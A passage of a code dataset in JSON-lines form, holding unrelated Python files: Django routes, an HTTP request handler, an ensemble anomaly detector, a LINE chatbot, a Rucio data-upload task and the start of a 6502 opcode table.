system={}\".format(storage_system.number_of_items()))\n\nfor i, item_event in enumerate(storage_system.item_event_controller):\n print(\"{}: {}\".format(i+1, item_event))\n\n\n#snapshots = storage_system.snapshot_controller.snapshots()\nfor (index, snapshot) in enumerate(storage_system.snapshot_controller):\n print(\"{}: {}\\n\".format(index+1, str(snapshot)))\n#\n#\nsnapshot_reporter = storagesystem.StorageSystemSnapshotReporter(storage_system.snapshot_controller)\n#\nfor i, sizes in enumerate(snapshot_reporter.values('size')):\n print(\"{}: {}\".format(i+1, sizes))\n#\nfor i, size in enumerate(snapshot_reporter.average('size')):\n print(\"{}: {}\".format(i+1, size))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"615136055","text":"from django.urls import path\nfrom .views import (\n UserListView,\n UserDetailView,\n UserFollowersListView,\n UserFollowingListView,\n UserBlockedUserListView,\n UserBlockingUserListView,\n FollowCreateView,\n FollowDestroyView,\n BlockCreateView\n)\n\napp_name=\"User\"\n\nurlpatterns = [\n path(\"api/users/\", UserListView.as_view(), name=\"user-list\"),\n path(\"api/users//\", UserDetailView.as_view(), name=\"user-detail\"),\n path(\"api/users//followers/list\", UserFollowersListView.as_view(), name=\"user-followers-list\"),\n path(\"api/users//following/list\", UserFollowingListView.as_view(), name=\"user-following-list\"),\n path(\"api/users//blocks/list\", UserBlockedUserListView.as_view(), name=\"user-blocks-list\"),\n path(\"api/users//blocking/list\", UserBlockingUserListView.as_view(), name=\"user-blocking-list\"),\n path(\"api/follow/create\", FollowCreateView.as_view(), name=\"follow-create\"),\n path(\"api/follow/delete\", 
FollowDestroyView.as_view(), name=\"follow-destroy\"),\n path(\"api/block/create\", BlockCreateView.as_view(), name=\"block-create\")\n]\n","sub_path":"analyticsApp/User/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149889185","text":"import http.server\nimport http.client\nfrom urllib.parse import urlparse\nimport urllib\n\nfrom web_server import templates\nfrom web_server.routes import RouteManager\n\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n\n def handle_one_request(self):\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(http.client.REQUEST_URI_TOO_LONG)\n return\n if not self.raw_requestline:\n self.close_connection = True\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n\n content = None\n route_found = False\n m = RouteManager().mapper()\n route_data = m.match(self.path)\n if route_data:\n handler_class = RouteManager.get_handler_class(route_data['controller'])\n class_method = route_data['action']\n content = getattr(handler_class(), class_method)(self)\n route_found = True\n\n if not route_found:\n self.send_error(\n http.client.NOT_IMPLEMENTED,\n \"Unsupported method (%r)\" % self.command)\n return\n if not content:\n self.send_error(\n http.client.NO_CONTENT,\n \"No content (%r)\" % self.command)\n return\n\n self.wfile.write(str(content).encode())\n self.wfile.flush()\n\n except http.server.socket.timeout as e:\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = True\n\n @property\n def decode_post_data(self):\n post = self.rfile.read(int((self.headers['Content-Length'])))\n bytes_decode_post = bytes.decode(post)\n return urllib.parse.parse_qs(bytes_decode_post)\n\n def render(self, template_pass, data=None):\n self.send_response(http.client.OK)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n content = str(templates.render(\n template_pass, data))\n return content\n","sub_path":"web_server/request_handlers.py","file_name":"request_handlers.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"431109437","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nAnomaly detector that averages normalized outlier scores from Local Outlier\r\nFactor, one-class SVM, and Isolation Forest.\r\n\r\n@author: Kevin S. Xu\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.ensemble import IsolationForest\r\nfrom sklearn import svm\r\nfrom sklearn.neighbors import LocalOutlierFactor\r\n\r\n\r\ndef predictAnomalies(trainFeatures,testFeatures):\r\n nAttr = len(trainFeatures.dtype)\r\n nCatAttr = 3\r\n nRealAttr = nAttr - nCatAttr\r\n nTrainSamples = np.size(trainFeatures)\r\n nTestSamples = np.size(testFeatures)\r\n \r\n # Get list of names of categorical attributes\r\n catAttrNames = list(trainFeatures.dtype.names[-nCatAttr:])\r\n \r\n # Convert categorical features to binary using 1-of-K representation \r\n trainCat = trainFeatures[catAttrNames]\r\n trainCatDict = catFeatureDict(trainCat,catAttrNames)\r\n dv = DictVectorizer()\r\n trainCatEncoded = dv.fit_transform(trainCatDict).toarray()\r\n testCat = testFeatures[catAttrNames]\r\n testCatDict = catFeatureDict(testCat,catAttrNames)\r\n testCatEncoded = dv.transform(testCatDict).toarray() \r\n \r\n # Extract real features and convert all to float type\r\n trainReal = np.zeros((nTrainSamples,nRealAttr))\r\n testReal = np.zeros((nTestSamples,nRealAttr))\r\n for attr in range(nRealAttr):\r\n trainReal[:,attr] = trainFeatures['f' + str(attr)].astype(float)\r\n testReal[:,attr] = testFeatures['f' + str(attr)].astype(float)\r\n \r\n # Combine real features and encoded categorical features (now all of type\r\n # float)\r\n trainAll = np.c_[trainReal,trainCatEncoded]\r\n testAll = np.c_[testReal,testCatEncoded]\r\n \r\n # Ensemble anomaly detector--combine normalized outlier scores from LOF,\r\n # one-class SVM, and Isolation Forest\r\n \r\n #LOF: large values correspond to inliers; after np.abs, larger means more abnormal (scores then normalized to [0,1])\r\n outlierFactor = LocalOutlierFactor(n_neighbors=10, novelty=True, contamination=\"auto\")\r\n outlierFactor.fit(trainAll)\r\n outlierScore = outlierFactor.score_samples(testAll)\r\n outlierScore = np.abs(outlierScore)\r\n outlierScore = (outlierScore - min(outlierScore)) / (max(outlierScore) - min(outlierScore))\r\n \r\n \r\n #gives 0 to 1 results\r\n SVMfunction = svm.OneClassSVM(kernel = \"rbf\", gamma=\"auto\")\r\n SVMfunction.fit(trainAll)\r\n SVMScore = SVMfunction.score_samples(testAll)\r\n SVMScore = np.abs(SVMScore)\r\n SVMScore = (SVMScore - min(SVMScore)) / (max(SVMScore) - min(SVMScore))\r\n\r\n \r\n #isoforest: the more negative the score, the more abnormal; after np.abs, more positive means more abnormal\r\n isolateForest = IsolationForest(contamination=\"auto\",behaviour=\"new\")\r\n isolateForest.fit(trainAll)\r\n isoScore = isolateForest.score_samples(testAll)\r\n isoScore = np.abs(isoScore)\r\n isoScore = (isoScore - min(isoScore)) / (max(isoScore) - min(isoScore))\r\n\r\n #higher score means more abnormal\r\n AverageScore = (outlierScore + SVMScore + isoScore) / 3\r\n \r\n return AverageScore\r\n\r\n\"\"\"\r\nConvert structured array of categorical variables (represented as byte\r\nstrings) to a list of dictionaries with values as decoded strings\r\n\"\"\"\r\ndef catFeatureDict(catArray,catAttrNames):\r\n catDict = []\r\n for row in catArray:\r\n dictRow = {}\r\n for col in range(len(row)):\r\n dictRow[catAttrNames[col]] = row[col]\r\n catDict.append(dictRow)\r\n \r\n return catDict\r\n \r\nif __name__ == \"__main__\":\r\n data = np.genfromtxt('trainData.csv',delimiter=',',dtype=None,\r\n encoding=None)\r\n trainData = data[::2]\r\n testData = data[1::2]\r\n anomScores = predictAnomalies(trainData,testData)\r\n print(anomScores)\r\n f = open(\"Scores.txt\", \"w\")\r\n i 
= 1\r\n for score in anomScores:\r\n f.write(str(i))\r\n f.write(\")\")\r\n f.write(str(score))\r\n f.write(\"\\n\")\r\n i = i + 2\r\n f.close()\r\n ","sub_path":"anomalyIds.py","file_name":"anomalyIds.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651897397","text":"#!/usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom select_mod_knn_op import SelectModKnn as SelectKnn\n\n#extent = 4\n\ngranularity = 100\npsize = 3\n\n\nx,y = np.meshgrid(np.linspace(0,4,granularity),np.linspace(0,4,granularity))\n\n#make it position vectors\npos = np.concatenate( [np.expand_dims(x,axis=2),np.expand_dims(y,axis=2)],axis=-1 )\npos = np.reshape(pos, [-1,2])\ncols = pos[...,0]*0.\n\n\ntransform = np.expand_dims(np.random.rand(2,2),axis=0)\ntpos = np.expand_dims(pos, axis=1)\ntpos = tpos*transform\ntpos = np.sum(tpos, axis=-1)\n\nradius_in_trsf = (np.max(tpos[...,0])-np.min(tpos[...,0]))/20.\n\ncols = np.where((tpos[...,0]-tpos[granularity//2:granularity//2+1,0])**2 + \n    (tpos[...,1]-tpos[granularity//2:granularity//2+1,1])**2 < radius_in_trsf, 1, cols)\n\nselpos = pos#[np.max(pos,axis=-1) list[dict]\n\n    all_bubbles = []\n    for each in search_result:\n        แถวที่พบ = each[\"true_row\"]\n        คำที่ค้นหา = text_from_user\n        คะแนนความเที่ยงตรง = each[\"score\"]\n        คอลัมน์ที่ค้นพบคำนี้ = each[\"col_name\"]\n\n        รายการที่ค้นพบ = each[\"result\"] #dictionary\n\n        bubble = flex_find_row(แถวที่พบ,คำที่ค้นหา,คะแนนความเที่ยงตรง,คอลัมน์ที่ค้นพบคำนี้,รายการที่ค้นพบ)\n        all_bubbles.append(bubble)\n\n    flex_to_reply = make_carousel(all_bubble = all_bubbles)\n\n    flex_to_reply = SetMessage_Object(flex_to_reply)\n    reply_msg(reply_token,data=flex_to_reply,bot_access_key=channel_access_token)\n\n    return 'OK'\n    \n    elif action == \"FIND_VALUE\":\n        # 1. 
reply back asking the user to enter a keyword\n all_text = []\n for each in response:\n text = TextSendMessage(text=each)\n all_text.append(text)\n \n line_bot_api.reply_message(reply_token,messages=all_text) #reply the message back\n\n return 'OK'\n \n elif action == \"FIND_VALUE_GET_COLUMN\":\n\n all_text = []\n for each in response:\n text = TextSendMessage(text=each)\n all_text.append(text)\n\n line_bot_api.reply_message(reply_token,messages=all_text) #reply the message back\n\n return 'OK'\n \n elif action == \"FIND_VALUE_GET_COLUMN_RESULT\":\n\n col_to_find = response[0] ## dialogflow says which column the user wants to search\n\n CSV = csvFinder(csvPath=\"./CSVs/รายการบ้านสองชั้น.csv\")\n CSV.set_finding_column(\"รายการ\")\n CSV.add_stop_word(\"จำนวน\",\"ปริมาณ\",\"ราคา\",\"หน่วย\",\"อยากทราบ\",\"หน่อย\",\"ถาม\")\n search_result = CSV.find_value(val=text_from_user,col_to_find=col_to_find,limit=10) #search\n\n results = [i[\"result\"] for i in search_result]\n\n flex = flex_find_value(คำที่ค้นหา=text_from_user,results=results)\n # print(flex)\n flex_to_reply = SetMessage_Object(flex)\n reply_msg(reply_token,data=flex_to_reply,bot_access_key=channel_access_token)\n\n return 'OK'\n\n # CSV = csvFinder(csvPath=os.path.join(csv_storage_path,csv_files[0]))\n # res = CSV.find_row(val=text_from_user,limit=3)\n\n@handler.add(FollowEvent)\ndef Greeting(event):\n reply_token = event.reply_token #reply token\n userid = event.source.user_id #user id\n\n\n action1 = MessageAction(label=\"ค้นหาแบบแถว\",text=\"ค้นหาแบบแถว\")\n action2 = MessageAction(label=\"ค้นหาแบบคอลัมน์\",text=\"ค้นหาแบบคอลัมน์\")\n\n qbtn1 = QuickReplyButton(action=action1)\n qbtn2 = QuickReplyButton(action=action2)\n\n qreply = QuickReply(items=[qbtn1,qbtn2])\n\n text = TextSendMessage(text = \"สวัสดีครับ ยินดีต้อนรับสู่บริการของเรา\",quick_reply=qreply)\n\n line_bot_api.reply_message(reply_token,messages=text) #reply the message back\n \n\n\nif __name__ == \"__main__\":\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"Credentials.json\"\n os.environ[\"DIALOGFLOW_PROJECT_ID\"] = \"axial-device-255804\"\n app.run(port=5000,debug=True)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381349733","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nfrom admix.helper import helper\nimport time\nimport shutil\n\nfrom admix.interfaces.database import ConnectMongoDB\nfrom admix.helper.decorator import Collector\n\n#get Rucio imports done:\nfrom admix.interfaces.rucio_dataformat import ConfigRucioDataFormat\nfrom admix.interfaces.rucio_summoner import RucioSummoner\nfrom admix.utils import make_did\nfrom admix.utils.list_file_replicas import list_file_replicas\nimport pymongo\n\n@Collector\nclass Upload():\n\n    def __init__(self):\n        pass\n\n    def init(self):\n        helper.global_dictionary['logger'].Info(f'Init task {self.__class__.__name__}')\n\n        open(\"/tmp/admix-upload_from_lngs\", 'a').close()\n\n        #Take all data types categories\n        self.NORECORDS_DTYPES = helper.get_hostconfig()['norecords_types']\n        self.RAW_RECORDS_DTYPES = helper.get_hostconfig()['raw_records_types']\n        self.RECORDS_DTYPES = helper.get_hostconfig()['records_types']\n\n        # Choose which RSE you want upload to\n        self.UPLOAD_TO = helper.get_hostconfig()['upload_to']\n\n        #Choose which data type you want to treat\n        self.DTYPES = self.NORECORDS_DTYPES + self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES\n\n        if helper.global_dictionary.get('high'):\n            self.DTYPES = 
self.NORECORDS_DTYPES \n\n if helper.global_dictionary.get('low'):\n self.DTYPES = self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES\n\n\n self.DATADIR = helper.get_hostconfig()['path_data_to_upload']\n self.periodic_check = helper.get_hostconfig()['upload_periodic_check']\n\n #Init the runDB\n self.db = ConnectMongoDB()\n\n #Init Rucio for later uploads and handling:\n self.rc = RucioSummoner(helper.get_hostconfig(\"rucio_backend\"))\n self.rc.SetRucioAccount(helper.get_hostconfig('rucio_account'))\n self.rc.SetConfigPath(helper.get_hostconfig(\"rucio_cli\"))\n self.rc.SetProxyTicket(helper.get_hostconfig('rucio_x509'))\n self.rc.SetHost(helper.get_hostconfig('host'))\n self.rc.ConfigHost()\n self.rc.SetProxyTicket(\"rucio_x509\")\n\n\n def find_next_run_to_upload(self):\n# cursor = self.db.db.find({'status': 'eb_ready_to_upload', 'bootstrax.state': 'done' }, {'number': 1, 'data': 1})\n cursor = self.db.db.find({'status': { '$in': ['eb_ready_to_upload','transferring']}, 'bootstrax.state': 'done' }, {'number': 1, 'data': 1})\n id_run = 0\n min_run = float('inf')\n\n for run in cursor:\n print(run['number'])\n if run['number']<10000:\n continue\n# if run['number'] not in [11345, 11346, 11379]:\n# continue\n\n if run['number'] < min_run:\n min_run = run['number']\n id_run = run['_id']\n print(\" \",min_run)\n return id_run\n\n\n def find_next_run_and_dtype_to_upload(self):\n cursor = self.db.db.find({'status': { '$in': ['eb_ready_to_upload','transferring']}, 'bootstrax.state': 'done' }, {'number': 1, 'data': 1, 'bootstrax': 1}).sort('number',pymongo.ASCENDING)\n id_run = 0\n min_run = float('inf')\n\n cursor = list(cursor)\n\n helper.global_dictionary['logger'].Info('\\t==> Runs in queue: {0}'.format(len(cursor)))\n\n for run in cursor:\n\n # Get run number\n number = run['number']\n\n # Forget about old runs\n if number<10000:\n continue\n\n # For debugging: select a specific run\n# if number not in [7235]:\n# continue\n# if run['number'] not in [11345, 11346, 11379]:\n# continue\n\n # Extracts the correct Event Builder machine who processed this run\n bootstrax = run['bootstrax']\n eb = bootstrax['host'].split('.')[0]\n\n # Look for the first data type available to be uploaded\n datum = None\n for dtype in self.DTYPES:\n\n # start patch\n# run_numbers = ['010644', '010801', '010802', '010803', '010878', '010879', '010910', '010912', '010913', '010919', '010932', '010933', '010934', '010935', '010936', '010937', '010938', '010939', '010940', '010941', '010942', '010943', '010944', '010945', '010946', '010947', '010948', '010951', '010952', '010964', '010966', '010967', '010973', '010976', '010977', '010978', '010979', '010980', '010982', '010984', '010985', '010986', '010987', '010988', '010989', '010990', '010991', '010992', '010993', '010994', '010995', '010996', '010997', '010998', '010999', '011000', '011001', '011002', '011003', '011004', '011005', '011006', '011007', '011008', '011009', '011010', '011011', '011012', '011013', '011014', '011015', '011016', '011017', '011018', '011019', '011020', '011021', '011022', '011023', '011024', '011025', '011026', '011027', '011028', '011029', '011030', '011032', '011050', '011051']\n# if '%06d' % number not in run_numbers:\n# continue\n# dtypes = ['peaklets', 'lone_hits', 'records', 'veto_regions', 'pulse_counts']\n# if dtype not in dtypes:\n# continue\n# eb = 'eb3'\n\n\n #if dtype != \"raw_records_aqmon\":\n # continue\n\n # search if dtype still has to be uploaded\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and ('status' 
not in d or ('status' in d and d['status'] == 'eb_ready_to_upload')):\n datum = d\n break\n \n if datum is not None:\n break\n\n # If there is a candidate data type, return run_id and data type\n if datum is not None:\n return run['_id'], datum\n\n return 0,''\n\n\n\n\n def add_rule(self,run_number, dtype, hash, rse, datum=None, lifetime=None, update_db=True):\n did = make_did(run_number, dtype, hash)\n if dtype in self.NORECORDS_DTYPES:\n priority = 1\n else:\n priority = 3\n result = self.rc.AddRule(did, rse, lifetime=lifetime, priority=priority)\n #if result == 1:\n # return\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}: rule added: {2} ---> {3}'.format(run_number,dtype,did,rse))\n\n if update_db:\n self.db.db.find_one_and_update({'number': run_number},\n {'$set': {'status': 'transferring'}}\n )\n\n rucio_rule = self.rc.GetRule(did, rse=rse)\n updated_fields = {'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': rse,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferring',\n 'did': did,\n 'protocol': 'rucio'\n }\n\n if datum == None:\n data_dict = updated_fields\n else:\n data_dict = datum.copy()\n data_dict.update(updated_fields)\n\n docid = self.db.db.find_one({'number': run_number}, {'_id': 1})['_id']\n self.db.AddDatafield(docid, data_dict)\n\n\n def add_conditional_rule(self,run_number, dtype, hash, from_rse, to_rse, datum=None, lifetime=None, update_db=True):\n did = make_did(run_number, dtype, hash)\n if dtype in self.NORECORDS_DTYPES:\n priority = 1\n else:\n priority = 3\n result = self.rc.AddConditionalRule(did, from_rse, to_rse, lifetime=lifetime, priority=priority)\n #if result == 1:\n # return\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}: conditional rule added: {2} ---> {3}'.format(run_number,dtype,did,to_rse))\n\n if update_db:\n self.db.db.find_one_and_update({'number': run_number},\n {'$set': {'status': 'transferring'}}\n )\n\n rucio_rule = self.rc.GetRule(did, rse=to_rse)\n updated_fields = {'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': to_rse,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferring',\n 'did': did,\n 'protocol': 'rucio'\n }\n\n if datum == None:\n data_dict = updated_fields\n else:\n data_dict = datum.copy()\n data_dict.update(updated_fields)\n\n docid = self.db.db.find_one({'number': run_number}, {'_id': 1})['_id']\n self.db.AddDatafield(docid, data_dict)\n\n\n\n def run(self,*args, **kwargs):\n helper.global_dictionary['logger'].Info(f'Run task {self.__class__.__name__}')\n\n if helper.global_dictionary.get('high'):\n helper.global_dictionary['logger'].Info(f'Only high level datatypes')\n\n if helper.global_dictionary.get('low'):\n helper.global_dictionary['logger'].Info(f'Only low level datatypes')\n\n\n # Get a new run to upload\n id_to_upload, datum = self.find_next_run_and_dtype_to_upload()\n if id_to_upload == 0:\n helper.global_dictionary['logger'].Info('\\t==> No data type available to upload')\n return 0\n\n # Load the run\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n\n # Get run number\n number = run['number']\n\n # Set run status to \"transferring\"\n self.db.SetStatus(number, 'transferring')\n\n # Extracts the correct Event Builder machine who processed this run\n bootstrax = run['bootstrax']\n eb = bootstrax['host'].split('.')[0]\n\n# eb = 'eb3'\n\n# # Performs upload on selected run\n# helper.global_dictionary['logger'].Info('Uploading run {0} from {1}'.format(number,eb))\n\n\n # Attempting to book 
this data type\n dtype = datum['type']\n file = datum['location'].split('/')[-1]\n hash = file.split('-')[-1]\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, trying to book data type {1} for uploading. Starting match'.format(number,dtype))\n\n # Books the eb data entry by setting its status to the PID of the process\n PID = str(os.getpid())\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': PID}})\n\n # Wait for 20 seconds\n time.sleep(20)\n\n # Then check if this status is still equal to the same PID\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n datum = None\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and hash in d['location'] and d['status']==PID:\n datum = d\n break\n \n # If there is no data available to upload any more, exit\n if datum is None:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, lost challenge, data type {1} not available any more'.format(number,dtype))\n return 0\n\n # Match won. Proceeding with uploading\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, match won, starting uploading data type {1}'.format(number,dtype))\n\n # Modify data type status to \"transferring\"\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': \"transferring\"}})\n\n # Wait for 3 seconds\n time.sleep(3)\n\n # Reloading the updated datum\n run = self.db.db.find_one({'_id': id_to_upload}, {'number': 1, 'data': 1, 'bootstrax': 1})\n datum = None\n for d in run['data']:\n if d['type'] == dtype and eb in d['host'] and hash in d['location']:\n datum = d\n break\n\n # Check, for coherency, if there is no rucio entry in DB for this data type\n in_rucio_upload_rse = False\n in_rucio_somewhere_else = False\n for d in run['data']:\n if d['type'] == datum['type'] and d['host'] == 'rucio-catalogue' and hash in d['did'] and d['location'] == self.UPLOAD_TO:\n in_rucio_upload_rse = True\n if d['type'] == datum['type'] and d['host'] == 'rucio-catalogue' and hash in d['did'] and d['location'] != self.UPLOAD_TO:\n in_rucio_somewhere_else = True\n\n if in_rucio_upload_rse:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a DB entry for RSE {2}. Forced to stop'.format(number,dtype,self.UPLOAD_TO))\n return 0\n\n if in_rucio_somewhere_else:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a DB entry for some external RSE. Forced to stop'.format(number,dtype))\n return 0\n\n # Preparing relevant info for uploading\n \n file = datum['location'].split('/')[-1]\n hash = file.split('-')[-1]\n upload_path = os.path.join(self.DATADIR, eb, file)\n did = make_did(number, dtype, hash)\n\n # Querying Rucio: if a rule exists already for this DID on LNGS, skip uploading\n rucio_rule = self.rc.GetRule(upload_structure=did, rse=self.UPLOAD_TO)\n if rucio_rule['exists']:\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1} has already a Rucio rule for RSE {2}. 
Forced to stop'.format(number,dtype,self.UPLOAD_TO))\n return 0\n \n # Finally, start uploading with Rucio\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, start uploading, DID = {2}'.format(number,dtype,did))\n result = self.rc.Upload(did, upload_path, self.UPLOAD_TO, lifetime=None)\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, uploaded, DID = {2}'.format(number,dtype,did))\n\n # Wait for 10 seconds\n time.sleep(10)\n \n # Checking the status of this new upload rule\n rucio_rule = self.rc.GetRule(upload_structure=did, rse=self.UPLOAD_TO)\n if rucio_rule['state'] != 'OK':\n helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, according to Rucio, uploading failed. Forced to stop'.format(number,dtype))\n exit()\n\n # Checking the actual number of files uploaded\n# nfiles = len(list_file_replicas(number, dtype, hash, rucio_rule['rse']))\n# if nfiles != datum['file_count']:\n# helper.global_dictionary['logger'].Info('\\t==> Run {0}, data type {1}, unconsistent number of files (Rucio: {2}, DB: {3}). Forced to stop'.format(number,dtype,nfiles,datum['file_count']))\n# exit() \n\n # Update the eb data entry with status \"transferred\"\n self.db.db.find_one_and_update({'_id': id_to_upload,'data': {'$elemMatch': datum}},\n {'$set': {'data.$.status': \"transferred\"}})\n\n # Add a new data field with LNGS as RSE and with status \"trasferred\"\n data_dict = datum.copy()\n data_dict.update({'host': \"rucio-catalogue\",\n 'type': dtype,\n 'location': self.UPLOAD_TO,\n 'lifetime': rucio_rule['expires'],\n 'status': 'transferred',\n 'did': did,\n 'protocol': 'rucio'\n })\n self.db.AddDatafield(run['_id'], data_dict)\n\n # set a rule to ship data on GRID\n if rucio_rule['state'] == 'OK':\n if dtype in self.NORECORDS_DTYPES:\n self.add_rule(number, dtype, hash, 'UC_DALI_USERDISK',datum=datum)\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_DALI_USERDISK', 'UC_OSG_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'UC_DALI_USERDISK', 'CCIN2P3_USERDISK',datum=datum)\n elif dtype in self.RECORDS_DTYPES:\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n self.add_rule(number, dtype, hash, 'CCIN2P3_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_OSG_USERDISK', 'CCIN2P3_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'CCIN2P3_USERDISK', 'SURFSARA_USERDISK',datum=datum)\n elif dtype in self.RAW_RECORDS_DTYPES:\n# self.add_rule(number, dtype, hash, 'UC_OSG_USERDISK',datum=datum)\n self.add_rule(number, dtype, hash, 'CCIN2P3_USERDISK',datum=datum)\n# self.add_conditional_rule(number, dtype, hash, 'UC_OSG_USERDISK', 'CNAF_TAPE2_USERDISK',datum=datum)\n self.add_conditional_rule(number, dtype, hash, 'CCIN2P3_USERDISK', 'CNAF_TAPE2_USERDISK',datum=datum)\n\n return 0\n\n\n def __del__(self):\n pass\n","sub_path":"admix/tasks/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":17175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560641607","text":"import re\r\n\r\nopcodes = {\r\n '---': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'ADC': {'SNGL': 'null', 'INDY': '71', 'IMM': '69', 'INDX': '61', 'ZPX': '75', 'ABS': '6d', 'ABSY': '79', 'BRA': 'null', 'ZPY': 'null', 
'IND': 'null', 'ZP': '65', 'ABSX': '7d'},\r\n 'AND': {'SNGL': 'null', 'INDY': '31', 'IMM': '29', 'INDX': '21', 'ZPX': '35', 'ABS': '2d', 'ABSY': '39', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '25', 'ABSX': '3d'},\r\n 'ASL': {'SNGL': '0a', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': '16', 'ABS': '0e', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '06', 'ABSX': '1e'},\r\n 'BCC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '90', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BCS': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'b0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BEQ': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'f0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BIT': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': '2c', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': '24', 'ABSX': 'null'},\r\n 'BMI': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '30', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BNE': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'd0', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BPL': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '10', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BRK': {'SNGL': '00', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': 'null', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BVC': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 'null', 'BRA': '50', 'ZPY': 'null', 'IND': 'null', 'ZP': 'null', 'ABSX': 'null'},\r\n 'BVS': {'SNGL': 'null', 'INDY': 'null', 'IMM': 'null', 'INDX': 'null', 'ZPX': 'null', 'ABS': 'null', 'ABSY': 